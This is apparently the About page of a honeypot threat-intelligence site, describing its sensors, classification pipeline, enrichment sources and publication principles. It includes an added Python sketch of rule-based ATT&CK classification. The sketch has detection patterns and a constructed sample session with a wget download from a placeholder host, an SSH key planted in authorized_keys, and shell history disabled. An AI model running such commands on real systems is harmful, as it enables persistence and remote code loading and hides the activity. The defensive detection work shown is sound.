About

Distributed honeypot sensors capture real attacker behavior across multiple continents. Every session, command, and credential on this site is observed, never simulated.

// HOW IT WORKS

Passive collection only: Sensors observe attacker intent, never execution. No exploit payloads are sent. No active scanning is performed.

Sensors run Beelzebub, an open-source honeypot framework. SSH services use LLM-powered interactive responses that convince attackers they have access to a real server, sustaining sessions long enough to capture full attack chains. HTTP services emulate AI infrastructure (Ollama, OpenAI-compatible APIs, MCP endpoints) to catch the wave of attackers now scanning for exposed models and agent gateways.

// PIPELINE

TRAP (Sensors) → CLASSIFY (Intent) → ENRICH (Threat Intel) → STORE (Database) → PUBLISH (Dashboard)

A custom classification engine processes sensor events in real time, with commands, credentials, and payloads mapped to MITRE ATT&CK techniques. All classification is deterministic pattern matching. No ML.
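
A minimal sketch of deterministic, rule-based command classification of the kind described above. This is an added example, not the site's own engine: the rule patterns, function names, and sample session are assumptions constructed for illustration, while the ATT&CK technique IDs are real.

```python
import re

# Ordered rule table: (ATT&CK technique ID, technique name, pattern).
# The patterns are illustrative assumptions, not the site's actual rules.
RULES = [
    ("T1105", "Ingress Tool Transfer", re.compile(r"\b(wget|curl|tftp|scp)\b\s+\S")),
    ("T1082", "System Information Discovery", re.compile(r"\buname\b|/proc/cpuinfo|\blscpu\b")),
    ("T1033", "System Owner/User Discovery", re.compile(r"^\s*(whoami|id|w)\s*$")),
    ("T1098.004", "SSH Authorized Keys", re.compile(r">>?\s*\S*\.ssh/authorized_keys")),
    ("T1053.003", "Cron", re.compile(r"\bcrontab\b|/etc/cron")),
    ("T1070.003", "Clear Command History", re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b")),
]

# Shell separators; quoting is ignored, so a quoted ';' also splits (known limit).
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")

def classify_command(line):
    """Return the sorted ATT&CK IDs matched by one shell line."""
    hits = set()
    for segment in SEPARATORS.split(line):
        for tid, _name, pattern in RULES:
            if pattern.search(segment):
                hits.add(tid)
    return sorted(hits)  # sorted so identical input always yields identical output

def classify_session(commands):
    """Map each technique ID to the commands that triggered it."""
    report = {"unclassified": []}
    for line in commands:
        ids = classify_command(line)
        if not ids:
            report["unclassified"].append(line)  # kept for rule-gap review
        for tid in ids:
            report.setdefault(tid, []).append(line)
    return report

# Constructed sample session (not captured data); example.invalid is a placeholder.
SAMPLE_SESSION = [
    "uname -a; whoami",
    "cd /tmp && wget http://example.invalid/install.sh",
    "echo 'ssh-rsa AAAA constructed' >> ~/.ssh/authorized_keys",
    "unset HISTFILE",
    "ls -la",
]

if __name__ == "__main__":
    for tid, cmds in classify_session(SAMPLE_SESSION).items():
        print(tid, cmds)
```

Keeping unmatched commands in an explicit bucket makes rule gaps visible instead of silently dropping them.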

// ENRICHMENT

Each session is enriched from multiple external sources before publication:

AbuseIPDB: Abuse confidence scoring and automated reporting
GreyNoise: Internet noise classification and benign service identification
VirusTotal: IP reputation from 70+ security vendors
MaxMind: IP geolocation and ASN attribution

// PRINCIPLES

Evidence over speculation: We show what we captured. When we infer, we say so.
Scoped claims: Four sensors across three continents. Good coverage, not global visibility.
No actor attribution: Source IP doesn't equal origin. We describe behavior, not identity.
Publication safety: No working exploits. No credential pairs. Compromised infrastructure redacted.